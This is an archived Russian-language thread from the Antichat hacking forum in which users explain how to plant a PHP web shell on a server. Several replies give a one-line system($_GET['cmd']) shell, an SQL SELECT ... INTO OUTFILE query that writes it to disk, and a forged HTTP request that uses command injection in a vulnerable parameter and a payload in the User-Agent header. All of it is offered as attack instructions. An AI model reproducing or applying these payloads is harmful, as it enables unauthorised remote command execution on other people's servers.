Форум АНТИЧАТ - Заливка shell при помощи потделки Http запроса

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Заливка shell при помощи потделки Http запроса (https://forum.antichat.xyz/showthread.php?t=26103)

Dimazzz

28.10.2006 14:56

Заливка shell при помощи потделки Http запроса

Огрмная просьба , расскажите о этом способе заливки шела по подробнее никак не могу понять как это сделать. Если кто еще умеет через Sql в админке тоже огромная просьба рассказать. Просто другие варианты отпали.

_-[A.M.D]HiM@S-_

28.10.2006 16:22

Полноценный шелл залит.

TaNkist

29.10.2006 08:35

Подделка HTTP-запроса:
Может тебе поможет софтина RAW HTTP REQUEST (_h0ld-up-team.net.ru). Это прога отправит пакет, который создает на сервере файл и пропишет в него простой php-шелл.
SQL
Создаешь базу с 1 полем, со строкой:

PHP код:


		
			
<?system($_GET['cmd'])?>

Затем составляешь SQL-запрос:
SELECT <название поля> FROM <Имя таблицы> INTO OUTFILE 'путь к шеллу'
Единственное условие ты должен иметь права на запись в папку, куда собираешься залить шелл.

Sharky

29.10.2006 10:38

Цитата:

Сообщение от TaNkist

PHP код:


		
			
<?system($_GET['cmd'])?>

по поводу RAW HTTP REQUEST можно поподробней...как составлять запрос?

TaNkist

29.10.2006 18:49

Примерный запрос

Код:

GET Уязвимый скрипт?Уязвимый параметр=|echo%20$HTTP_USER_AGENT%20>%20путь к шеллу|    

 HTTP/1.1

Host: Уязвимый хост

User-Agent: <? system(GET['cmd']) ?>

S1nt3z

29.10.2006 22:01

хы .. можно воспользоваться прогой от отечественного произодителя Antichat :)
_http://antichat.ru/inetcrack/ :)

Soul Linker

30.10.2006 09:53

А вообще есть мануал по разным способам заливки шелла? или их не столь много?

S1nt3z

30.10.2006 10:12

Just google it! :)
попробуй разобраться сам .. больше опыта будет ;)

Время: 15:50